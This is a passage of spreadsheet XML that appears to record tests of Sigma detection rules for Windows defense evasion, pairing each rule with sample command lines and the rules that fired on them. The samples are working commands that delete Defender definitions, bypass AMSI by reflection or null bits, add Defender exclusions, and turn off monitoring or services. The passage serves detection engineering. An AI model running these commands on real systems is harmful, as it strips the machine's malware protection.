      <c r="A3870" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3870" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C3870" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D3870" s="44" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E3870" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe "-RemoveDefinitions" "-All"</t>
        </is>
      </c>
      <c r="F3870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3870" s="44" t="n"/>
      <c r="J3870" s="44" t="n"/>
      <c r="K3870" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3871" ht="15.75" customHeight="1" s="42">
      <c r="A3871" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3871" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C3871" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D3871" s="44" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E3871" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe	-RemoveDefinitions	-All</t>
        </is>
      </c>
      <c r="F3871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3871" s="44" t="n"/>
      <c r="J3871" s="44" t="n"/>
      <c r="K3871" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3872" ht="15.75" customHeight="1" s="42">
      <c r="A3872" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3872" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C3872" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D3872" s="44" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E3872" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -All -RemoveDefinitions</t>
        </is>
      </c>
      <c r="F3872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3872" s="44" t="n"/>
      <c r="J3872" s="44" t="n"/>
      <c r="K3872" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3873" ht="15.75" customHeight="1" s="42">
      <c r="A3873" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3873" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C3873" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D3873" s="44" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E3873" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe    -RemoveDefinitions    -All</t>
        </is>
      </c>
      <c r="F3873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3873" s="44" t="n"/>
      <c r="J3873" s="44" t="n"/>
      <c r="K3873" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3874" ht="15.75" customHeight="1" s="42">
      <c r="A3874" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3874" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_init_failed_bypass</t>
        </is>
      </c>
      <c r="C3874" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection</t>
        </is>
      </c>
      <c r="D3874" s="44" t="inlineStr">
        <is>
          <t>30edb182-aa75-42c0-b0a9-e998bb29067c</t>
        </is>
      </c>
      <c r="E3874" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,1)"</t>
        </is>
      </c>
      <c r="F3874" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3874" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J3874" s="44" t="n"/>
      <c r="K3874" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3875" ht="15.75" customHeight="1" s="42">
      <c r="A3875" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3875" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_init_failed_bypass</t>
        </is>
      </c>
      <c r="C3875" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection</t>
        </is>
      </c>
      <c r="D3875" s="44" t="inlineStr">
        <is>
          <t>30edb182-aa75-42c0-b0a9-e998bb29067c</t>
        </is>
      </c>
      <c r="E3875" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','Static,NonPublic').SetValue($null,$true)"</t>
        </is>
      </c>
      <c r="F3875" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3875" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J3875" s="44" t="n"/>
      <c r="K3875" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3876" ht="15.75" customHeight="1" s="42">
      <c r="A3876" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3876" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_init_failed_bypass</t>
        </is>
      </c>
      <c r="C3876" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection</t>
        </is>
      </c>
      <c r="D3876" s="44" t="inlineStr">
        <is>
          <t>30edb182-aa75-42c0-b0a9-e998bb29067c</t>
        </is>
      </c>
      <c r="E3876" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Ref].Assembly.GetType('System.Management.Automation.' + 'AmsiUtils').GetField('amsi' + 'InitFailed','NonPublic,Static').SetValue($null,$true)"</t>
        </is>
      </c>
      <c r="F3876" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3876" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J3876" s="44" t="n"/>
      <c r="K3876" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3877" ht="15.75" customHeight="1" s="42">
      <c r="A3877" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3877" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_init_failed_bypass</t>
        </is>
      </c>
      <c r="C3877" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection</t>
        </is>
      </c>
      <c r="D3877" s="44" t="inlineStr">
        <is>
          <t>30edb182-aa75-42c0-b0a9-e998bb29067c</t>
        </is>
      </c>
      <c r="E3877" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Ref].Assembly.GetType(\"System.Management.Automation.AmsiUtils\").GetField(\"amsiInitFailed\",\"NonPublic,Static\").SetValue($null,$true)"</t>
        </is>
      </c>
      <c r="F3877" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3877" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J3877" s="44" t="n"/>
      <c r="K3877" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3878" ht="15.75" customHeight="1" s="42">
      <c r="A3878" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3878" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_init_failed_bypass</t>
        </is>
      </c>
      <c r="C3878" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection</t>
        </is>
      </c>
      <c r="D3878" s="44" t="inlineStr">
        <is>
          <t>30edb182-aa75-42c0-b0a9-e998bb29067c</t>
        </is>
      </c>
      <c r="E3878" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a = 'System.Management.Automation.AmsiUtils'; [Ref].Assembly.GetType($a).GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"</t>
        </is>
      </c>
      <c r="F3878" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3878" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c); Potential AMSI Bypass Via .NET Reflection (30edb182-aa75-42c0-b0a9-e998bb29067c)</t>
        </is>
      </c>
      <c r="J3878" s="44" t="n"/>
      <c r="K3878" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3879" ht="15.75" customHeight="1" s="42">
      <c r="A3879" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3879" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_null_bits_bypass</t>
        </is>
      </c>
      <c r="C3879" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Using NULL Bits</t>
        </is>
      </c>
      <c r="D3879" s="44" t="inlineStr">
        <is>
          <t>92a974db-ab84-457f-9ec0-55db83d7a825</t>
        </is>
      </c>
      <c r="E3879" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "if(0){{{0}}}' -f $(0 -as [char]) + #&lt;NULL&gt;"</t>
        </is>
      </c>
      <c r="F3879" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3879" s="44" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential AMSI Bypass Using NULL Bits (92a974db-ab84-457f-9ec0-55db83d7a825); Potential AMSI Bypass Using NULL Bits (92a974db-ab84-457f-9ec0-55db83d7a825)</t>
        </is>
      </c>
      <c r="J3879" s="44" t="n"/>
      <c r="K3879" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3880" ht="15.75" customHeight="1" s="42">
      <c r="A3880" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3880" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_null_bits_bypass</t>
        </is>
      </c>
      <c r="C3880" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Using NULL Bits</t>
        </is>
      </c>
      <c r="D3880" s="44" t="inlineStr">
        <is>
          <t>92a974db-ab84-457f-9ec0-55db83d7a825</t>
        </is>
      </c>
      <c r="E3880" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "if(0){{{0}}}' -f $(0 -as [char]) +"; #&lt;NULL&gt;</t>
        </is>
      </c>
      <c r="F3880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3880" s="44" t="n"/>
      <c r="J3880" s="44" t="n"/>
      <c r="K3880" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3881" ht="15.75" customHeight="1" s="42">
      <c r="A3881" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3881" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_null_bits_bypass</t>
        </is>
      </c>
      <c r="C3881" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Using NULL Bits</t>
        </is>
      </c>
      <c r="D3881" s="44" t="inlineStr">
        <is>
          <t>92a974db-ab84-457f-9ec0-55db83d7a825</t>
        </is>
      </c>
      <c r="E3881" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "if(0){{{0}}}' -f $(0 -as [char]) +" -EncodedCommand "#&lt;NULL&gt;"</t>
        </is>
      </c>
      <c r="F3881" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3881" s="44" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential AMSI Bypass Using NULL Bits (92a974db-ab84-457f-9ec0-55db83d7a825); Potential AMSI Bypass Using NULL Bits (92a974db-ab84-457f-9ec0-55db83d7a825); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3881" s="44" t="n"/>
      <c r="K3881" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3882" ht="15.75" customHeight="1" s="42">
      <c r="A3882" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3882" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C3882" s="44" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D3882" s="44" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E3882" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; { Add-MpPreference -ExclusionPath 'C:\\\\temp' }"</t>
        </is>
      </c>
      <c r="F3882" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3882" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3882" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J3882" s="44" t="n"/>
      <c r="K3882" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3883" ht="15.75" customHeight="1" s="42">
      <c r="A3883" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3883" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C3883" s="44" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D3883" s="44" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E3883" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; { Set-MpPreference -ExclusionPath 'C:\\temp' }"</t>
        </is>
      </c>
      <c r="F3883" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3883" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3883" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J3883" s="44" t="n"/>
      <c r="K3883" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3884" ht="15.75" customHeight="1" s="42">
      <c r="A3884" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3884" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C3884" s="44" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D3884" s="44" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E3884" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; { Add-MpPreference  -ExclusionPath 'C:/temp' }"</t>
        </is>
      </c>
      <c r="F3884" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3884" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3884" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J3884" s="44" t="n"/>
      <c r="K3884" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3885" ht="15.75" customHeight="1" s="42">
      <c r="A3885" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3885" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C3885" s="44" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D3885" s="44" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E3885" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; { Set-MpPreference -ExclusionPath ${env:TEMP} }"</t>
        </is>
      </c>
      <c r="F3885" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3885" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3885" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3885" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J3885" s="44" t="n"/>
      <c r="K3885" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3886" ht="15.75" customHeight="1" s="42">
      <c r="A3886" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3886" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C3886" s="44" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D3886" s="44" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E3886" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; { Add-MpPreference -ExclusionPath ( 'C:\\temp' ) }"</t>
        </is>
      </c>
      <c r="F3886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3886" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3886" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f); Powershell Defender Exclusion (17769c90-230e-488b-a463-e05c08e9d48f)</t>
        </is>
      </c>
      <c r="J3886" s="44" t="n"/>
      <c r="K3886" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3887" ht="15.75" customHeight="1" s="42">
      <c r="A3887" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3887" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_disable_feature</t>
        </is>
      </c>
      <c r="C3887" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Disable Scan Feature</t>
        </is>
      </c>
      <c r="D3887" s="44" t="inlineStr">
        <is>
          <t>1ec65a5f-9473-4f12-97da-622044d6df21</t>
        </is>
      </c>
      <c r="E3887" s="44" t="inlineStr">
        <is>
          <t>Set-MpPreference -DisableRealtimeMonitoring 1</t>
        </is>
      </c>
      <c r="F3887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3887" s="44" t="n"/>
      <c r="J3887" s="44" t="n"/>
      <c r="K3887" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3888" ht="15.75" customHeight="1" s="42">
      <c r="A3888" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3888" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_disable_feature</t>
        </is>
      </c>
      <c r="C3888" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Disable Scan Feature</t>
        </is>
      </c>
      <c r="D3888" s="44" t="inlineStr">
        <is>
          <t>1ec65a5f-9473-4f12-97da-622044d6df21</t>
        </is>
      </c>
      <c r="E3888" s="44" t="inlineStr">
        <is>
          <t>Set-MpPreference -DisableIOAVProtection -DisableBehaviorMonitoring</t>
        </is>
      </c>
      <c r="F3888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3888" s="44" t="n"/>
      <c r="J3888" s="44" t="n"/>
      <c r="K3888" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3889" ht="15.75" customHeight="1" s="42">
      <c r="A3889" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3889" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_disable_feature</t>
        </is>
      </c>
      <c r="C3889" s="44" t="inlineStr">
        <is>
          <t>Powershell Defender Disable Scan Feature</t>
        </is>
      </c>
      <c r="D3889" s="44" t="inlineStr">
        <is>
          <t>1ec65a5f-9473-4f12-97da-622044d6df21</t>
        </is>
      </c>
      <c r="E3889" s="44" t="inlineStr">
        <is>
          <t>Set-MpPreference -DisableCatchupFullScan; $true</t>
        </is>
      </c>
      <c r="F3889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3889" s="44" t="n"/>
      <c r="J3889" s="44" t="n"/>
      <c r="K3889" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3890" ht="15.75" customHeight="1" s="42">
      <c r="A3890" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3890" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C3890" s="44" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D3890" s="44" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E3890" s="44" t="inlineStr">
        <is>
          <t>cmd /c "powershell -Command "&amp; {Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Internet Explorer\\Main' -name 'IEHarden'  -value 0 -Force}""</t>
        </is>
      </c>
      <c r="F3890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3890" s="44" t="n"/>
      <c r="J3890" s="44" t="n"/>
      <c r="K3890" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3891" ht="15.75" customHeight="1" s="42">
      <c r="A3891" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3891" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3891" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3891" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3891" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {Set-Service -Name wuauserv -StartupType Disabled}"</t>
        </is>
      </c>
      <c r="F3891" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3891" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J3891" s="44" t="n"/>
      <c r="K3891" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3892" ht="15.75" customHeight="1" s="42">
      <c r="A3892" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3892" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3892" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3892" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3892" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command Set-Service -Name wuauserv -StartupType Manual</t>
        </is>
      </c>
      <c r="F3892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3892" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J3892" s="44" t="n"/>
      <c r="K3892" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3893" ht="15.75" customHeight="1" s="42">
      <c r="A3893" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3893" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3893" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3893" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3893" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-Service -Name wuauserv -StartupType Disabled</t>
        </is>
      </c>
      <c r="F3893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3893" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J3893" s="44" t="n"/>
      <c r="K3893" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3894" ht="15.75" customHeight="1" s="42">
      <c r="A3894" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3894" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3894" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3894" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
